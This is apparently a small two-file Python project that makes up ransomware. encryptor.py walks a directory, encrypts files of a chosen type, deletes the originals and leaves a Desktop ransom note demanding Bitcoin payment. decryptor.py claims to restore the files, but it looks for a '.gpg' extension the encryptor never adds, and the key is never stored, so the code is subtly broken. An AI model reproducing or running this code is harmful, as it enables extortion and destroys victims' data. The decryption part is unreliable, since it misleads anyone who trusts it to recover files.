[
    {
        "file_name": "encryptor.py",
        "file_content": "import os\nimport base64\nimport shutil\nfrom cryptography.fernet import Fernet\n\n# Generate a key for encryption\nkey = Fernet.generate_key()\ncipher_suite = Fernet(key)\n\n# Function to encrypt a single file\ndef encrypt_file(file_path, key):\n    with open(file_path, 'rb') as file:\n        file_data = file.read()\n    encrypted_data = cipher_suite.encrypt(file_data)\n    return encrypted_data\n\n# Function to traverse the directory and encrypt files of a specified type\ndef traverse_and_encrypt(directory, file_type):\n    encrypted_files = []\n    for root, _, files in os.walk(directory):\n        for file in files:\n            if file.endswith(file_type):\n                file_path = os.path.join(root, file)\n                encrypted_data = encrypt_file(file_path, key)\n                encrypted_file_path = os.path.join(root, base64.b64encode(file.encode()).decode())\n                with open(encrypted_file_path, 'wb') as encrypted_file:\n                    encrypted_file.write(encrypted_data)\n                encrypted_files.append(encrypted_file_path)\n                os.remove(file_path)\n    return encrypted_files\n\n# Function to create an HTML file with encryption details\ndef create_html_file(file_path, content):\n    with open(file_path, 'w') as html_file:\n        html_file.write(content)\n\n# Function to generate HTML content for encrypted files\ndef generate_encrypted_files_html(encrypted_files):\n    html_content = \"<html><body><h1>Encrypted Files</h1><ul>\"\n    for file in encrypted_files:\n        html_content += f\"<li>{file}</li>\"\n    html_content += \"</ul></body></html>\"\n    return html_content\n\n# Function to generate HTML content for decryption instructions\ndef generate_decryption_instructions():\n    unique_id = \"1234567890\"  # Example unique ID\n    payment_info = \"Pay 100 USD to the following Bitcoin address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\"\n    contact_info = \"Contact us at support@example.com for decryption key.\"\n    html_content = f\"\"\"\n    <html>\n    <body>\n    <h1>Your Files Have Been Encrypted</h1>\n    <p>Unique ID: {unique_id}</p>\n    <p>{payment_info}</p>\n    <p>{contact_info}</p>\n    </body>\n    </html>\n    \"\"\"\n    return html_content\n\n# Main function to execute the encryption process\ndef main(directory, file_type):\n    encrypted_files = traverse_and_encrypt(directory, file_type)\n    encrypted_files_html = generate_encrypted_files_html(encrypted_files)\n    decryption_instructions_html = generate_decryption_instructions()\n\n    desktop_path = os.path.join(os.path.expanduser(\"~\"), \"Desktop\")\n    create_html_file(os.path.join(desktop_path, \"READTO-DECRYPT.html\"), decryption_instructions_html)\n    create_html_file(os.path.join(desktop_path, \"FILES-ENCRYPTED.html\"), encrypted_files_html)\n\nif __name__ == \"__main__\":\n    directory_to_encrypt = \"/path/to/directory\"  # Specify the directory to encrypt\n    file_type_to_encrypt = \".txt\"  # Specify the file type to encrypt\n    main(directory_to_encrypt, file_type_to_encrypt)"
    },
    {
        "file_name": "decryptor.py",
        "file_content": "import os\nimport base64\nfrom cryptography.fernet import Fernet\n\n# Function to decrypt a single file\ndef decrypt_file(encrypted_file_path, key):\n    with open(encrypted_file_path, 'rb') as encrypted_file:\n        encrypted_data = encrypted_file.read()\n    cipher_suite = Fernet(key)\n    decrypted_data = cipher_suite.decrypt(encrypted_data)\n    return decrypted_data\n\n# Function to traverse the directory and decrypt files\ndef traverse_and_decrypt(directory, key):\n    for root, _, files in os.walk(directory):\n        for file in files:\n            if file.endswith(\".gpg\"):  # Assuming encrypted files have a .gpg extension\n                file_path = os.path.join(root, file)\n                decrypted_data = decrypt_file(file_path, key)\n                original_file_name = base64.b64decode(file[:-4]).decode()  # Remove .gpg extension and decode\n                original_file_path = os.path.join(root, original_file_name)\n                with open(original_file_path, 'wb') as decrypted_file:\n                    decrypted_file.write(decrypted_data)\n                os.remove(file_path)\n\n# Main function to execute the decryption process\ndef main(directory, key):\n    traverse_and_decrypt(directory, key)\n\nif __name__ == \"__main__\":\n    directory_to_decrypt = \"/path/to/directory\"  # Specify the directory to decrypt\n    encryption_key = b'YOUR_ENCRYPTION_KEY_HERE'  # Replace with the actual encryption key\n    main(directory_to_decrypt, encryption_key)"
    }
]